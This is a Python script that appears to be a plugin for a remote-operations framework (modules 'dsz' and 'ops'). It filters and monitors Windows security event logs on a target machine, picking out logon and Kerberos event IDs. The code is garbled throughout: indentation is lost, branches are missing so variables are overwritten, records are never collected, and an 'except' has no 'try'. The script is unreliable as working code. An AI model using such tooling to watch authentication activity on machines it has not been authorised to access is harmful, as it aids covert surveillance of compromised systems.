149 lines
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149 lines
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import dsz
import ops.cmd
from ops.pprint import pprint
from datetime import date
from datetime import datetime
from datetime import timedelta
import sys
import dsz.version.checks.windows
from ops.parseargs import ArgumentParser
import ops.timehelper
def getmostrecentrecordnum(eventlog='security'):
eventcmd = ops.cmd.getDszCommand('eventlogquery', log=eventlog)
eventobject = eventcmd.execute()
current_recnum = eventobject.eventlog[0].mostrecentrecordnum
return current_recnum
def processeventobj(eventobject, summary):
record_list = []
if (len(eventobject.record) > 0):
last_date = eventobject.record[0].datewritten
date_list = last_date.split('-')
last_date = date(int(date_list[0]), int(date_list[1]), int(date_list[2]))
for record in eventobject.record:
rec_dict = {'number': None, 'id': None, 'datewritten': None, 'timewritten': None, 'computer': None, 'user': None, 'eventtype': None}
rec_dict['number'] = record.number
rec_dict['id'] = record.id
rec_dict['datewritten'] = record.datewritten
rec_dict['timewritten'] = record.timewritten
rec_dict['computer'] = record.computer
rec_dict['user'] = record.user
rec_dict['eventtype'] = record.eventtype
if summary:
string_list = []
for item in record.string:
string_list.append(item.value.strip().replace('\r', '').replace('\n', '').replace('\t', ''))
rec_dict['summary'] = ';'.join(string_list)
return record_list
def eventlogtime(log='Security', max=100, num=1000, id_list=None, sid=None, string_opt_list=None, startrecord=None, xpath=None, target=None, summary=False, logons=False):
record_list = []
color_list = []
eventcmd = ops.cmd.getDszCommand('eventlogfilter')
eventcmd.log = log
eventcmd.max = max
eventcmd.num = num
if (id_list is not None):
id_list = id_list.split(',')
id_list = [None]
if (sid is not None):
eventcmd.sid = sid
if (string_opt_list is not None):
string_opt_list = string_opt_list.split(',')
string_opt_list = [None]
if (startrecord is not None):
eventcmd.startrecord = startrecord
if (xpath is not None):
eventcmd.xpath = xpath
if (target is not None):
eventcmd.target = target
if logons:
if dsz.version.checks.windows.IsVistaOrGreater():
id_list = ['4776', '4624', '5140', '4634', '4768', '4769', '4672']
id_list = ['680', '540', '538', '672', '673', '576']
for id in id_list:
for string_opt in string_opt_list:
eventcmd.id = None
eventcmd.string = None
if (id is not None):
eventcmd.id = id
if (string_opt is not None):
eventcmd.string = string_opt
eventobject = eventcmd.execute()
record_list.extend(processeventobj(eventobject, summary))
if (len(record_list) == 0):
dsz.ui.Echo('No records returned', dsz.ERROR)
return False
record_list.sort(key=(lambda x: x['number']))
date_list = record_list[0]['datewritten'].split('-')
last_date = date(int(date_list[0]), int(date_list[1]), int(date_list[2]))
for record in record_list:
date_list = record['datewritten'].split('-')
this_date = date(int(date_list[0]), int(date_list[1]), int(date_list[2]))
if (this_date != last_date):
if (last_date == (this_date - timedelta(days=1))):
last_date = this_date
if (not summary):
pprint(record_list, header=['date', 'time', 'recnum', 'id', 'computer', 'user', 'eventtype'], dictorder=['datewritten', 'timewritten', 'number', 'id', 'computer', 'user', 'eventtype'], echocodes=color_list)
pprint(record_list, header=['date', 'time', 'recnum', 'id', 'computer', 'user', 'eventtype', 'summary'], dictorder=['datewritten', 'timewritten', 'number', 'id', 'computer', 'user', 'eventtype', 'summary'], echocodes=color_list)
def main(args):
parser = ArgumentParser()
group_target = parser.add_argument_group('Target', 'Options that describe the event log to query')
group_target.add_argument('--log', action='store', dest='log', default='security', help='The event log to search. Default = Security')
group_target.add_argument('--target', action='store', dest='target', help='Remote machine to query')
group_limiters = parser.add_argument_group('Limiters', 'Options that limit the range over which we are searching')
group_limiters.add_argument('--num', action='store', dest='num', default=1000, type=int, help="The number of entries to parse. A value of zero will result in all entries being parsed. Parsing will cease once the first 1000 records are found unless the 'max' keyword is used.")
group_limiters.add_argument('--max', action='store', dest='max', default=100, type=int, help='Maximum entries returned from the target. Default=1000. A value of 0 will result in all possible entries returned. It is recommended that a value of 0 not be used due to the fact that a large database could result in an excessive number of entries being parsed and cause a slowdown in the speed and memory usage of the LP.')
group_limiters.add_argument('--startrecord', action='store', dest='startrecord', help='Record with which to begin filtering. Default = Most recent record.')
group_filters = parser.add_argument_group('Filters', 'Options that describe what we are looking for')
group_filters.add_argument('--id', action='store', dest='id', help='The Event ID on which to filter. Default = No filtering.')
group_filters.add_argument('--logons', action='store_true', dest='logons', default=False, help='Eventlogfilter for common authentication logs')
group_filters.add_argument('--string', action='store', dest='string_opt', help='String in entry on which to filter. Default = No filtering.')
group_filters.add_argument('--sid', action='store', dest='sid', help='Username on which to filter. Default = No filtering.')
group_filters.add_argument('--xpath', action='store', dest='xpath', help='XPath expression for search.')
group_output = parser.add_argument_group('Output', 'Options that change the output')
group_output.add_argument('--summary', action='store_true', dest='summary', default=False, help='Display a list of the strings associated with each event record')
group_monitor = parser.add_argument_group('Monitor', 'Options that deal with monitoring')
group_monitor.add_argument('--monitor', action='store_true', dest='monitor', default=False, help='Execute the eventlogfilter command at a given interval and display any new results')
group_monitor.add_argument('--interval', action='store', dest='interval', default='5m', type=ops.timehelper.get_seconds_from_age, help='Interval at which to monitor')
options = parser.parse_args()
last_record = 0
newest_record = 0
querymax = options.max
querynum = options.num
startrecord = options.startrecord
while True:
if options.monitor:
newest_record = getmostrecentrecordnum(eventlog=options.log)
if (not (last_record == 0)):
querynum = (newest_record - last_record)
startrecord = newest_record
querymax = querynum
if (querymax == 0):
dsz.ui.Echo(('[%s] No new records' % ops.timestamp()), dsz.WARNING)
dsz.Sleep((options.interval * 1000))
dsz.ui.Echo(('=' * 80), dsz.GOOD)
eventlogtime(log=options.log, max=querymax, num=querynum, id_list=options.id, sid=options.sid, string_opt_list=options.string_opt, startrecord=startrecord, xpath=options.xpath, target=options.target, summary=options.summary, logons=options.logons)
last_record = newest_record
if (not options.monitor):
dsz.Sleep((options.interval * 1000))
if (__name__ == '__main__'):
except RuntimeError as e:
dsz.ui.Echo(('\nCaught RuntimeError: %s' % e), dsz.ERROR)